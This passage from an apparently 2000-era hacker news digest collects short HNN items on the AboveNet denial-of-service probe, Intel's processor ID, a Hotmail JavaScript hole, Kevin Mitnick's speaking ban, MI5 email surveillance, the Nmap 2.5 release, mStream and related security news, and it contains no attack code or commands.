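Any "exposed" result means the file is still reachable without an NT account
and the permissions from step 2 are not in effect on that server.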
@HWA
122.0 [HNN] FBI Investigating AboveNet DoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 28th
contributed by root66
The FBI is investigating a denial of service attack that hit San
Jose-based AboveNet Communications Inc. on Tuesday. According to
AboveNet the attack was directed at a network device called a customer
aggregation switch. The problem lies within AboveNet's methodologies
as opposed to a vulnerability within the switch, said a representative
of AboveNet.
ComputerWorld
http://www.computerworld.com/home/print.nsf/(frames)/000427D962?OpenDocument&~f
FBI investigates cyberattack against AboveNet
By Ann Harrison 04/27/2000
As investigators continue to search for attackers who temporarily shut
down eight e-commerce sites in February, another company was hit by a
different type of denial-of-service attack Tuesday.
The FBI is investigating a denial-of-service attack launched against San
Jose-based AboveNet Communications Inc. that blocked traffic to almost a
thousand content and service providers.
FBI spokeswoman Deb Weierman said the bureau is looking into the AboveNet
incident "to see what activity went on." However, she added that because
it is an ongoing case, she couldn't divulge any details about the
investigation.
Unlike the earlier distributed denial-of-service attacks that flooded
e-commerce sites with false data traffic, this attack was directed against
a switch in AboveNet's network. AboveNet's Internet Service Exchange (ISX)
network provides co-location services and Internet connectivity to
companies such as NetZero Inc., CNet Inc. and America Online Inc., which
wasn't affected by the outage.
"This wasn't just a teen-ager with a $300 Linux machine. This was someone
who had time to learn the trade," said Paul Vixie, senior vice president
of Internet services at Metromedia Fiber Network Inc. in White Plains,
N.Y., AboveNet's parent company. "It was certainly severe; most of our
customers were impacted for a period of hours."
According to Vixie, the attack was directed at a network device called a
customer aggregation switch. The switch bundles co-location customers at
the company's ISX facilities and links them to an Internet backbone as one
high-speed connection. Vixie said the attack hit three switches at the
company's ISX facilities in New York, Vienna, Va., and San Jose.
The switch is made by Cisco Systems Inc., but Vixie said the exploit had
nothing to do with a defect in the switch. He said the attacker exploited
a flaw in the switch's configuration management process that the company
has since changed.
"There are certainly good and bad ways to do that. We thought we were
using a good way, and (this week) we found out that we weren't," said
Vixie. "The hole closed was in the process, not in the product."
Stephen Northcutt, director of the Global Incident Analysis Center for the
SANS Institute, declined to comment on the specifics of the AboveNet case.
But he said the real problem isn't the attacks but what can be done about
them. "We're focusing on the wrong thing," Northcutt said. "We're focusing
on the actual attack. What we need to focus on are the systems that are
being compromised every day."
Vixie said he believes there is little opportunity for copycat attacks
because of the unique methods AboveNet used to manage its network. The
company suffered rolling outages from mid-morning Pacific time on Tuesday
to mid-afternoon. According to Vixie, many customers had alternative
carriers that ensured their network traffic got through -- a common
fail-over strategy for high-end customers. Very large customers, such as
AOL, whose traffic wasn't funneled through the aggregation switch, weren't
impacted.
Vixie advised other information technology managers who may be concerned
with the management of their switches to consult with their vendors on
proper switch management and configuration. He said swift action is also
needed to deflect such attacks. Close network monitoring revealed the
connectivity loss to customers, and AboveNet launched an investigation
immediately. "We used brute force," said Vixie. "We called everyone in on
the shift and went through the network with a fine-tooth comb, not only to
get everyone back up online, but to make sure there were no time bombs."
He added that no backdoors or other delayed exploits were detected.
Vixie says the company has speculated widely as to the motive for the
attack and concluded that it could have emerged from one of two
"completely useless categories." One category includes competitors that
the company took a customer away from, disgruntled former employees or
customers who had been disconnected because they were spamming. The other
category, said Vixie, includes "someone who has something to prove and
wants to bring our network down and wants to brag about it."
The denial-of-service attacks launched in February have proved difficult
to trace because of the sheer volume of the attacks and the fact that
targeted sites weren't able to capture attack data during the incident.
But Vixie said the FBI has a reasonable chance of catching his company's
attacker, partly because AboveNet has put resources into filtering,
logging and traffic analysis. "We did not come away from (Tuesday's)
experience completely ignorant," said Vixie.
The February attacks against eight large e-commerce sites appeared to
involve known attack tools such as Tribe Flood Network and Trinoo, which
use co-opted machines to send a storm of packets against targeted sites
(see story). Vixie said that because of the ongoing investigation, he
couldn't say whether known exploits were used in the AboveNet attack.
A 15-year-old Canadian, who allegedly calls himself Mafiaboy, was arrested
April 15 by the Royal Canadian Mounted Police and charged in connection
with a February denial-of-service attack against the CNN Web site. He was
charged with two counts of mischief to data, but security analysts believe
he likely wasn't responsible for the other attacks (see story). An
investigation is ongoing, but no other suspects have yet been named.
Brian Sullivan contributed to this story.
@HWA
123.0 [HNN] Intel Removes ID Feature From New Chips
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 28th
contributed by Evil Wench
Intel has decided to remove the controversial ID-tracking technology
from its next generation PC processor. The ID was included in Pentium
III chips as a way to help facilitate e-commerce solutions. Intel says
the increase in the technology of digital signatures led them to this
decision. (Yeah, the bad press and the boycott had nothing to do with
it.)
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2556671,00.html?chkpt
Intel disables ID tracking in new chips
There was a firestorm of protest when Intel put ID-tracking technology in
Pentium III chips. Now it's obsolete and being removed.
By Robert Lemos, ZDNet News April 27, 2000 12:40 PM PT
Intel Corp. says it plans to remove the controversial processor-ID
technology from its next-generation PC processor and from future
processors, ending a year-long battle with privacy advocates over the
invasive technology. "We made the decision earlier this year," George
Alfs, a spokesman for Intel (Nasdaq: INTC), said Thursday. "We are
not planning for (the chip ID) in our next processor."
Alfs said the rise of digital-signature technology has made the need for
chip IDs obsolete.
As first reported on ZDNet News more than a year ago, the inclusion of the
chip ID in the Pentium III processor touched off a heated controversy with
privacy advocates denouncing the technology as an attempt to track users
on the Internet.
Calls for boycott
Originally, Intel intended to ask PC makers to
ship machines with the processor ID "on" -- that is, accessible to
software -- but later changed tack by supplying a utility to customers to
turn the feature on and off. Still not satisfied, however, privacy
advocates and policy analysts called for a boycott of the chip maker.
The boycott may have gone a long way to decide the issue, said Jason
Catlett, president of pro-privacy Junkbusters Corp. "The thing that I am
very glad didn't happen was for the feature to go into the food chain of
the operating system, browser and e-commerce sites. The boycott probably
cut off a lot of the proliferation that could have happened."
Intel, however, said privacy arguments were less of a factor in the
decision than digital-signature technology. "The technology has moved
quite quickly," Alfs said. "With digital signatures you can do a lot of
the functions that we had envisioned doing with the processor serial
number." Its uses could have included authenticating customers for
e-commerce, secure network management and secure e-mail.
Security features panned
However, some security experts and privacy
advocates said the chip could not really add such security features at
all.
"Unfortunately, it doesn't do any of these things," wrote Bruce Schneier,
president of Counterpane Internet Security Inc. in a ZDNet column. "If a
remote Web site queries a processor ID, it has no way of knowing whether
the number it gets back is a real ID or a forged ID."
Intel won't stop adding security features, however. Its current
motherboard chip sets include a random-number generator, which helps
strengthen software encryption on the PC. That will stay, Alfs said.
Don't look for any more boycotts, however. Privacy proponents love
stronger encryption.
@HWA
124.0 [HNN] Another HotMail Hole Patched
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 28th
contributed by William Knowles
Microsoft has patched yet another HotMail hole. This one used
JavaScript to launch fraudulent password entry screens to trick people
into entering their passwords to their accounts.
C|Net
http://news.cnet.com/news/0-1005-200-1772642.html?tag
Microsoft zaps Hotmail password bug
By Paul Festa Staff Writer, CNET News.com April 27, 2000, 12:30 p.m. PT
Microsoft has patched a Hotmail bug that left users of the Web-based
email service vulnerable to a password-stealing trick.
The exploit was the latest in a series devised by bug hunters using
JavaScript to launch fraudulent password
entry screens to trick people into handing over control of their accounts.
JavaScript is a Web scripting language designed to take actions on a Web
site visitor's computer, such as launching a new window or scrolling text
across the screen, without the visitor's interaction. After the first few
password-stealing schemes came to light, Hotmail and other Web email
providers decided to filter JavaScript from incoming messages.
But bug hunters have kept themselves busy finding ways to sneak the code
around Hotmail's filters.
In the example addressed by Hotmail this week, Bulgarian bug hunter Georgi
Guninski demonstrated a way to inject JavaScript through a style tag. The
exploit worked only with Microsoft's Internet Explorer browser.
In response to news of the bug, Microsoft this week patched the Hotmail
servers.
@HWA
125.0 [HNN] Iron Feather Collection at Risk
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 28th
contributed by ifj
On April 23rd, Iron Feather and his wife Hanna Banana were fined at a
I-80 weigh station for transporting over 7,000 pounds of underground
zines. The weight of the printed material, the largest collection of
underground magazines in the world, caused their truck to be severely
overweight. Iron Feather & Hanna were detained until a $300 penalty
could be paid and the 7,000 pounds could be off loaded. Since their
collection is considered one of the nation's top archives of
underground zines they hope to retrieve the impounded storage from
Nebraska this summer. Iron Feather said, "Even though we lost our
savings on fines and we had to store the huge collection of
underground publications at a Nebraska locker we will not let them or
anyone impair our mission, to preserve & report on the cybertekpunk
cultures."
Iron Feather Journal
http://ironfeather.com
@HWA
126.0 [HNN] Rubicon This Weekend, H2K Announcement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 28th
contributed by RijiLV and macki
The con in MotorCity, Rubicon will be taking place this weekend. They
will be having speakers such as Richard Thieme, Tim Crothers, TDYC!,
Peter Stephenson and others.
Rubi-con
H2K KEYNOTE SPEAKER
Hope2000 has announced that their keynote speaker will be Jello
Biafra, former lead singer of the Dead Kennedys and currently with
Lard. Over the years, Jello has become an outspoken critic of
censorship and the mass stupidity that embraces our culture. It's a
world those in the hacker community are quite familiar with. The
keynote is scheduled for Saturday, July 15 at noon. H2K will run from
July 14-16, 2000.
Hope 2000
HNN Cons Page
http://www.rubi-con.org
http://www.h2k.net
@HWA
127.0 [HNN] Laptop Issues Justice in Brazil
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 28th
contributed by Zorro
A Visual Basic software program known as 'Electronic Judge' is being
used on the streets of Brazil to assist in dispensing justice. The
software is installed on a laptop carried by a real judge who can then
use the software to help assess the situation and even issue sentences
on the spot. The software is currently being tested by three judges in
Espirito Santo in Brazil.
BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_726000/726837.stm
Wednesday, 26 April, 2000, 18:02 GMT 19:02 UK
Laptop is cyber judge and jury
[Image: Brazilian police at a protest]
An artificial-intelligence program called the Electronic Judge is
dispensing justice on the mean streets of Brazilian cities. The
program is installed on a laptop carried by a roaming human judge and
helps to assess swiftly and methodically witness reports and forensic
evidence at the scene of an incident. It then issues on-the-spot fines and
can even recommend jail sentences.
"I know that this is a little bit different, but it works"
-- Judge Pedro Valls Feu Rosa
The software is being tested by three
judges in the state of Espirito Santo. It is part of a scheme called
Justice-on-Wheels, which is designed to speed up Brazil's overloaded legal
system by dealing immediately with straightforward cases.
Most people are happy to have the matters sorted out on the spot, says the
program's creator, Judge Pedro Valls Feu Rosa, who sits in the state's
Supreme Court of Appeals. He adds that the idea is not to replace judges
but to make them more efficient.
Pure logic
After police alert the rapid justice team to minor accidents, they can be
on the scene within 10 minutes. Most cases require only simple questions
and no interpretation of the law - the decision-making process is purely
logical, Judge Feu Rosa claims in New Scientist magazine.
The program, written in the Visual Basic language, presents the judge with
multiple choice questions, such as "Did the driver stop at the red light?"
or "Had the driver been drinking alcohol above the acceptable limit of the
law?"
The Electronic Judge asks questions . . .
These sorts of questions need only yes or no answers, says Judge Feu Rosa:
"If we are concerned with nothing more than pure logic, then why not give
the task to a computer?" He notes that the program gives more than a
simple judgement: it also prints out its reasoning. If the human judge
disagrees with the decision it can simply be overruled.
He admits, however, that some people who have been judged by the program
do not realise that they have been tried by software.
. . . . and then delivers judgement.
It could be some time before a similar system takes the place of an
English court. "It would have to satisfy the authorities that it was
absolutely foolproof first," says a spokesman for the Lord Chancellor's
office, which oversees courts in England and Wales. But it could be
put to use in the US, where Judge Feu Rosa says he is in discussion with
insurance companies to set up a mobile system to resolve disputes over
traffic accidents.
@HWA
128.0 [HNN] CCPA and ECPA not Applicable
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 28th
contributed by project3
Kevin Giger of Highland, Illinois, was charged in Madison County
Circuit Court this week with computer tampering. Giger is accused of
altering the Web site of the Holiday Inn Express in Highland. Giger's
bail has been set at $15,000. The interesting part of this case is the
court's orders to the cable company which provided Internet access for
Mr. Giger. It is hard to interpret the legalese but it would seem that
the court in this case felt that the "Electronic Communications Privacy
Act," 18 U.S.C. 2703 and the "Cable Communications Policy Act," 47
U.S.C. 551 for some reason did not apply.
Highland
Third Judicial Circuit Madison County, Illinois
http://dreamwater.com/highland/
http://www.dreamwater.com/highland/order.htm
@HWA
129.0 [HNN] McAfee Redefines Trojan
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 28th
contributed by medic
A Trojan or Trojan Horse has traditionally been a piece of software
that executes malicious code while looking benign. Now a denial of
service tool has been labeled a 'Trojan virus' by McAfee. While the
software in question can potentially be malicious, that is its intended
purpose; it is not trying to hide anything. This willful morphing of
definitions by vendors makes it a little difficult for the rest of us.
NAI
http://vil.nai.com/villib/dispvirus.asp?virus_k
@HWA
130.0 [HNN] Mitnick Back in Court
~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 1st
contributed by Macki
The federal probation department has notified Kevin Mitnick's
probation officer that Kevin can no longer give lectures relating to
technology issues. Kevin feels that this is a direct violation of his
first amendment rights. The Associated Press has quoted a figure of
$20,000 worth of speaking engagements scheduled through August.
Mitnick and his lawyer, Los Angeles criminal defense lawyer Sherman
Ellison, will attempt to convince Judge Pfaelzer that Kevin should be
allowed to speak.
Associated Press
Security Focus
C|Net - Interview with Mitnick Regarding this latest government tactic
http://dailynews.yahoo.com/h/ap/20000428/tc/computer_hacker_1.html
http://www.securityfocus.com/news/23
http://news.cnet.com/news/0-1005-200-1781398.html?tag
Mitnick Muzzled
Ex-hacker plans his return to court after his ban on computing is
extended to speaking and writing.
By Kevin Poulsen April 25, 2000 2:13 AM PT
Kevin Mitnick has been yanked off the lecture circuit and ordered by the
U.S. Probation Office to halt his professional writing efforts, a move
that left a recent Salt Lake City computer conference without its star
speaker, and magazine publisher Steven Brill short one media critic for
his upcoming web offering.
"In regards to the numerous requests you have received concerning writing
and critiquing articles and speaking at conferences, we find it necessary
to deny your participation and recommend that you pursue employment in a
non-related field," reads an April 12th letter to Mitnick from the
Ventura, California U.S. Probation Office that supervises him.
"Right now, I've retained counsel to go ahead and try to get this
clarified," Mitnick said Monday. "I'm surprised, because all I was trying
to do through my writing and speaking was to tell people how information
security is important."
Mitnick is arguably the world's most well-known hacker. His current
notoriety came after he cracked a string of computers at cell phone
companies, universities and ISPs. He pleaded guilty in March, 1999 to
seven felonies, and was released from prison on January 21st, 2000 after
nearly five years in custody.
In February, Mitnick testified before a Senate committee about U.S.
government computer security. The same month, he wrote a five-hundred-word
commentary for Time Magazine opining on the high-profile denial of service
attacks that briefly struck down some of the most widely used e-commerce
sites on the web.
'I'm helping to protect people from the very conduct that I was once
engaged in' -- Kevin Mitnick
A disclaimer under his
article noted that it "should not be construed as technical advice of any
kind," a nod to special restrictions federal judge Marianna Pfaelzer
handed Mitnick as part of a 1997 sentence for cell phone fraud. Under that
ruling, Mitnick is not only banned for three years from using computers,
cell phones and the Internet, but he's barred from acting "as a consultant
or advisor to individuals or groups engaged in any computer related
activity," without the permission of the U.S. Probation Office.
Until this month, the Probation Office apparently didn't interpret that
broad order -- which was upheld by an appeals court in 1998 -- as an
obstacle to Mitnick's career ambitions.
"I wanted to work on a book," says Mitnick. "I wanted to work in these
speaking engagements and articles, and it was something that was
satisfying to me and something I could do" without using computers.
One source says that Mitnick had as much as $20,000 worth of speaking
engagements scheduled through August, when the April 12th decision put his
plans in limbo, and forced him to cancel a scheduled appearance last week
on an information security panel in Salt Lake City, Utah.
Brill's Discontent
Mitnick said he warned organizers of the Utah
NetTrends 2000 computer conference from the start that his appearance
would hang on the Probation Office's approval, and he's miffed that a
press release issued by the conference incorrectly claimed that a last
minute court ruling caused the cancellation.
In addition to speaking engagements, Mitnick had been entertaining more
offers to write for a variety of newspapers, magazines and web sites, and
had agreed to author a monthly column for Contentville, an e-commerce site
set to begin reviewing and selling books and magazines this summer.
"I wanted Kevin to write about consumer computer magazines," said Michael
Hsu, the Contentville editor who recruited Mitnick. "His situation, where
he can't touch computers or use cell phones, is unique, and I thought he
could bring an interesting perspective."
"From what I've been told about it, [the restriction] doesn't make any
sense, and I think if he has the legal resources he should be able to
challenge it successfully," said Steven Brill, Editor in Chief of the
media watchdog magazine Brill's Content, and founder of Contentville.
Brill said it's one thing to prevent a defendant from profiting from his
crimes... "It's quite another thing to say he can't talk to anyone about
anything. It just doesn't make any sense," said Brill, who still holds
some hope that Mitnick will be writing for Contentville. "If he is not
going to be able to do it, I'd be very disappointed."
"The government can impose any restrictions so long as they are reasonably
related to sentencing goals, and are no more restrictive than necessary,"
says Eugene Volokh, a UCLA Law School professor and expert in First
Amendment issues. "Off the top of my head, it's hard for me to imagine how
banning him from writing about computer magazines is consistent with those
goals. But I haven't heard the probation officer's point of view."
Reginald Valencia, Supervising United States Probation Officer, said
office confidentiality rules prevent him from commenting on the case. "Not
in any shape manner or form could I discuss it," said Valencia.
Volokh notes that sentencing judges and probation officers are generally
afforded great discretion in imposing supervision restrictions.
Mitnick acknowledges his chances are poor if he takes his fight up to the
appellate courts, but he adds that he and his new attorney, Los Angeles
criminal defense lawyer Sherman Ellison, don't plan on entering Judge
Pfaelzer's courtroom spouting case law and statutes.
"I'm helping to protect people from the very conduct that I was once
engaged in," said Mitnick. "We're going to go in there and explain to the
judge that this is good for the public and good for my rehabilitation."
@HWA
131.0 [HNN] MI5 To Build Email Eavesdropping Center
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 1st
contributed by Weld Pond
British security agency MI5 will be constructing a £25m email
surveillance center to monitor all emails sent and received in
Britain. While law enforcement will still need Home Office approval to
actually read emails and other messages, officials say the center is
needed in the fight against online crime. The new center will be called
GTAC, Government Technical Assistance Centre and will be operational
by the end of the year.
Sunday Times
http://www.sunday-times.co.uk/news/pages/sti/2000/04/30/stinwenws01034.html
MI5 builds new centre to read e-mails on the net
Nicholas Rufford
MI5 is building a new £25m e-mail surveillance centre that will have the
power to monitor all e-mails and internet messages sent and received in
Britain. The government is to require internet service providers, such as
Freeserve and AOL, to have "hardwire" links to the new computer facility
so that messages can be traced across the internet. The security
service and the police will still need Home Office permission to search
for e-mails and internet traffic, but they can apply for general warrants
that would enable them to intercept communications for a company or an
organisation.
The new computer centre, codenamed GTAC - government technical assistance
centre - which will be up and running by the end of the year inside MI5's
London headquarters, has provoked concern among civil liberties groups.
"With this facility, the government can track every website that a person
visits, without a warrant, giving rise to a culture of suspicion by
association," said Caspar Bowden, director of the Foundation for
Information Policy Research.
The government already has powers to tap phone lines linking computers,
but the growth of the internet has made it impossible to read all
material. By requiring service providers to install cables that will
download material to MI5, the government will have the technical
capability to read everything that passes over the internet.
Home Office officials say the centre is needed to tackle the use of the
internet and mobile phone networks by terrorists and international crime
gangs. Charles Clark, the minister in charge of the spy centre project,
said it would allow police to keep pace with technology.
"Hardly anyone was using the internet or mobile phones 15 years ago," a
Home Office source said. "Now criminals can communicate with each other by
a huge array of devices and channels and can encrypt their messages,
putting them beyond the reach of conventional eavesdropping."
There has been an explosion in the use of the internet for crime in
Britain and across the world, leading to fears in western intelligence
agencies that they will soon be left behind as criminals abandon the
telephone and resort to encrypted e-mails to run drug rings and illegal
prostitution and immigration rackets.
The new spy centre will decode messages that have been encrypted. Under
new powers due to come into force this summer, police will be able to
require individuals and companies to hand over computer "keys", special
codes that unlock scrambled messages.
There is controversy over how the costs of intercepting internet traffic
should be shared between government and industry. Experts estimate that
the cost to Britain's 400 service providers will be £30m in the first
year. Internet companies say that this is too expensive, especially as
many are making losses.
About 15m people in Britain have internet access. Legal experts have
warned that many are unguarded in the messages they send or the material
they download, believing that they are safe from prying eyes.
"The arrival of this spy centre means that Big Brother is finally here,"
said Norman Baker, Liberal Democrat MP for Lewes. "The balance between the
state and individual privacy has swung too far in favour of the state."
@HWA
132.0 [HNN] French ISP Wanadoo Vulnerable
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 1st
contributed by Thiebaut
French ISP Wanadoo has linked its web based email system to the IP
address of its users allowing them to read email online without
requiring a password. A simple proxy server will of course allow an
intruder to masquerade his IP address and read anyone's mail. There are
more than 1.5 million persons that are accessing the internet with
Wanadoo. This vulnerability has existed for over a month with no
resolution. France Telecom, owners of Wanadoo, have said the issue
concerns very few users and therefore have refused to correct the
problem.
Le Virus Informatique
http://www.acbm.com/wan.html
@HWA
133.0 [HNN] Russia Arrests 55 in Credit Card Scheme
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 1st
contributed by William Knowles
Police in Moscow have arrested five people involved in an elaborate
credit card scheme. The group allegedly set up a fake business with a
credit card merchant account called Politshop. Then members of the group
raided e-commerce vendors and placed fraudulent charges onto victims'
cards from Politshop. ITAR-TASS reports that $630,000 was stolen but
does not indicate how they were caught.
Associated Press - via Tampa Bay Online
http://ap.tbo.com/ap/breaking/MGII9EK5M7C.html
Url kicked the bit bucket
@HWA
134.0 [HNN] BTopenworld Suffers Information Leakage
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 1st
contributed by mr.big23
BTopenworld has suffered a security leak or glitch that has published
names, addresses, e-mail addresses, salary details and other personal
information from consumers and business people interested in BT's ADSL
products. Supposedly over three megabytes of customer data was left
wide open containing the personal information of thousands of users.
BTopenworld has since closed the hole and has stopped accepting
additional sign ups.
The Register UK
http://www.theregister.co.uk/000427-000028.html
Url croaked on a chicken bone
@HWA
135.0 [HNN] Nmap 2.5 Released
~~~~~~~~~~~~~~~~~~~~~~~~
May 1st
contributed by fyodor
The popular network scanning tool Nmap has finally come out of beta
and released version 2.5. It supports ping scanning, many port
scanning techniques, and TCP/IP fingerprinting. Nmap also offers
flexible target and port specification, decoy scanning, determination
of TCP sequence predictability characteristics, sunRPC scanning,
reverse-identd scanning, and more. Console and X-Window versions are
available in source or binary form. (Best of all it is free.)
Insecure.org
http://www.insecure.org/stf/Nmap-2.50-Release.html
@HWA
136.0 [HNN] Washington State Announces CLEW Agreement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 1st
contributed by William Knowles
Washington state Attorney General Christine Gregoire has
announced the Computer Law Enforcement of Washington agreement. The
agreement will allow federal, state, and local agencies to team up to
combat cyber crimes in the Pacific Northwest. Now that the agreement
has been signed the group will seek $2 million from taxpayers through
the U.S. Department of Justice and the Treasury to equip and expand
the program.
Wired
http://www.wired.com/news/politics/0,1283,35970,00.html
Northwest's Plans vs. Cybercrime by Manny Frishberg 3:00 a.m. Apr. 28,
2000 PDT
SEATTLE -- Federal, state, and local agencies are teaming up to combat
cybercrimes in the Pacific Northwest, hoping that the joint effort will
prove stronger than the abilities of individual agencies, whose resources
frequently are dwarfed by the magnitude of their challenges.
Washington state Attorney General Christine Gregoire, who announced the
program Thursday, said she hoped it would serve as a model for law
enforcement agencies around the country.
The CLEW agreement, or Computer Law Enforcement of Washington, was signed
by the heads of the respective agencies in early March, but was not made
public until Gregoire's press conference Thursday.
The program will streamline efforts to combat Internet crimes, said U.S.
Attorney Kate Pflaumer, adding that a lag in technological resources only
adds to cooperation problems between states and countries.
"The Internet does not recognize state or even national political
boundaries, so cooperation between law enforcement is imperative," she
said.
Starting with an agreement to cooperate and share existing resources,
Gregoire said the agencies will seek $2 million from the U.S. Department
of Justice and the Treasury to equip and expand the program.
In addition to providing computers and technicians who can tease data out
of computer systems and hard drives, the program will train law
enforcement personnel to seize computers and components using methods that
preserve their data.
Gregoire, flanked by the area's U.S. attorney, the head of the local FBI
office and the Tacoma city attorney, said she's pressing Congress to pass
legislation that would clarify where a crime has been committed when a Web
server is in one state and the person accessing the system is in another.
The group also hopes to establish uniform rules for getting search
warrants for Internet-based and computer data that would be respected by
all the states, so that a search warrant from Washington state could be
used to seize a server in Arizona, said Pierce County Prosecuting Attorney
John Landenburg.
With the Anarchist Cookbook home page projected onto a screen behind her,
Gregoire launched into a set of statistics to illustrate the scale of the
problem.
Eighty-five percent of all Internet bulletin board traffic is dedicated to
hacking, software piracy, or sex, Gregoire said, citing a New York Times
article.
In a recent FBI study of Fortune 500 companies, reported losses from
computer crime between 1997 and 1999 exceeded $360 million, and 62 percent
of those companies reported a computer security breach within the last
year, she added.
Landenburg, who's assembled a computer forensics lab for his area, said he
was concerned that 37 out of 38 jurisdictions in the state don't have the
resources to follow Tacoma's lead.
Landenburg said he still has problems keeping up with the pace of change
in the computer industry. "Every year we have to go out and replace our
equipment" to match that of the people the lab is investigating, he said.
In another component to the program, the University of Washington will
help out with a new Web-based center to handle consumer complaints and
mediate e-commerce disputes, Gregoire said.
@HWA
137.0 [HNN] New York Times Links to DeCSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 1st
contributed by Macki
The New York Times has linked directly to the 2600 list of sites which
currently house the DeCSS code. This action is similar to that for
which the MPAA is currently suing several web sites.
2600
New York Times
http://www.2600.com/news/2000/0428.html
http://www10.nytimes.com/library/tech/00/04/cyber/cyberlaw/28law.html
@HWA
138.0 [HNN] More E-zines
~~~~~~~~~~~~~~~~~~
May 1st
contributed by xellent55 and k-rad-bob
b0g has released its fourth issue. SWAT Magazine, the UK's longest
running underground magazine, has released issue 28.
b0g
Swat Team
http://www.b0g.org
http://www.swateam.org
139.0 [HNN] mStream Joins Trinoo, TFN and Stacheldraht
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 2nd
contributed by William Knowles
A new tool has joined the ranks of the old standbys in distributed DoS
attacks. Now not only are there the Trinoo, TFN and Stacheldraht tools,
there is also mStream. mStream was recently discovered on a compromised
Linux system in the wild. Initial analysis shows the program to be in
the early stages of development; however, it has the potential to be
much more powerful than existing tools.
C|Net
Security Focus - Source code analysis of mStream
http://news.cnet.com/news/0-1003-200-1798064.html?tag
http://www.securityfocus.com/templates/archive.pike?list
@HWA
140.0 [HNN] Phrack 56 Released
~~~~~~~~~~~~~~~~~~~~~~~~
May 2nd
contributed by wizdumb
One of the oldest and most respected underground e-zines has released
its 56th issue. Phrack 56 has articles on Bypassing StackGuard and
StackShield, Smashing C++ VPTRs, Anomaly Detection Model for IDS and
much much more with all your old favorite columns like Loopback and
Line Noise. (OK, who remembers what line noise rea*ly %ad*&% >< {|]!~
~!!)
Phrack
http://www.phrack.com/
@HWA
141.0 [HNN] Tech Crimes Get Double Sentences
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 2nd
contributed by acopalyse
The U.S. Sentencing Commission has sent guidelines to Congress that
would substantially increase penalties for such crimes as credit card
and identity theft, using computers to solicit or sexually exploit
minors and violating copyrights or trademarks online. The new
guidelines would effectively double many of the existing penalties.
The guidelines are slated to take effect November 1, 2000.
MSNBC
http://www.msnbc.com/news/401964.asp
Dead url
@HWA
142.0 [HNN] Numbers Numbers Who has the Numbers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 2nd
contributed by root66
So how many attempted cyber attacks do DOD computers fend off each
year? Depends on who you listen to and what you call an attack I
guess. It would appear that some officials don't know the difference
between a network query and an attempted intrusion. It would seem from
the numbers that attacks (network queries, intrusions, ???) against
DOD ranged somewhere between 58 and 250,000 for 1999.
Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0501/intercepts-05-01-00.asp
Intercepts BY Dan Verton 05/01/2000 The Hacker Equation
My mobile listening posts have discerned a confusing pattern of reports on
the number of hacker "attacks" launched against the Defense Department
each year.
It started out simple enough: Early last year, Air Force Maj. Gen. John
"Soup" Campbell, commander of the Joint Task Force for Computer Network
Defense, placed the number of "attacks" against DOD networks at 250,000
each year.
But in November 1999, Lt. Gen. David Kelley, director of the Defense
Information Systems Agency, talked about a 300 percent increase in the
number of "unauthorized intrusions."
Intrusions skyrocketed, according to Kelley, from 5,844 in 1998 to 18,433
through November 1999. (Campbell reported last week that this number
topped off at 22,144 for all of 1999.)
This year the numbers got more complicated. In March, Lt. Col. LeRoy
Lundgren, program manager for the Army's National Security Improvement
Program, said the Army alone denied as many as 285,000 network queries
last year because of questionable methods used in the queries. The
Interceptor guesses "network queries" are somehow similar to "attacks."
Enter the Justice Department. According to Justice, the number of hacking
cases throughout the government nearly doubled last year, reaching 1,154,
up from 547 in 1998. One look at these numbers and you have to wonder if
these guys even know that DOD is part of the federal government.
Then, of course, there are "incidents" and "intrusions" to deal with. Lt.
Gen. William Campbell, the Army's chief information officer, last week
told a crowd at the Association of the U.S. Army's annual symposium on
information assurance and battlefield visualization that the Army
experienced 3,077 "incidents" during fiscal 1999 and 58 "intrusions." For
fiscal 2000, those numbers had reached 2,230 and 40, respectively, by
April 4.
But "Soup" Campbell told the same crowd that in fiscal 1998 a total of
5,844 incidents were reported to the Pentagon by DOD commands. In fiscal
1999, that number reached 22,144, and during the first three months of
this year, that number had already surpassed 5,993, Campbell said.
Confused? I am.
Serving Campbell Soup at the CIA
"Soup" Campbell told the Interceptor last week that he's received orders
to report in June to CIA headquarters, where he will take over as the
director of military support. Speaking at the AUSA symposium, Campbell
also said the JTF-CND recently added legal counsel to its official
structure.
"I never thought I'd need a lawyer to do my business," Campbell said,
referring to the lack of legal guidelines governing computer network
attack and defense.
Hey, don't knock it, Soup. Legal counsel is highly underrated in this
world of error-prone databases and outdated hard-copy maps.
Fortunately, I hear that there's no shortage of lawyers in Langley, Va.
Go West, Young Man
My E-Ring listening post in the heart of the Pentagon has picked up
several low-level signals indicating that Paul Brubaker, the Defense
Department's acting deputy chief information officer, plans to leave his
position in a matter of weeks.
A strong supporter of the Navy/Marine Corps Intranet proposal, Brubaker
has apparently succumbed to "dot-com fever," according to sources, and
will be zapping himself out to the West Coast after he checks out of DOD.
One N/MCI insider said he hoped the move "is not a harbinger of the
future" for the beleaguered program.
Intercept something? Send it to the Interceptor at antenna@fcw.com.
@HWA
143.0 [HNN] Password Thief in Hong Kong Behind Bars
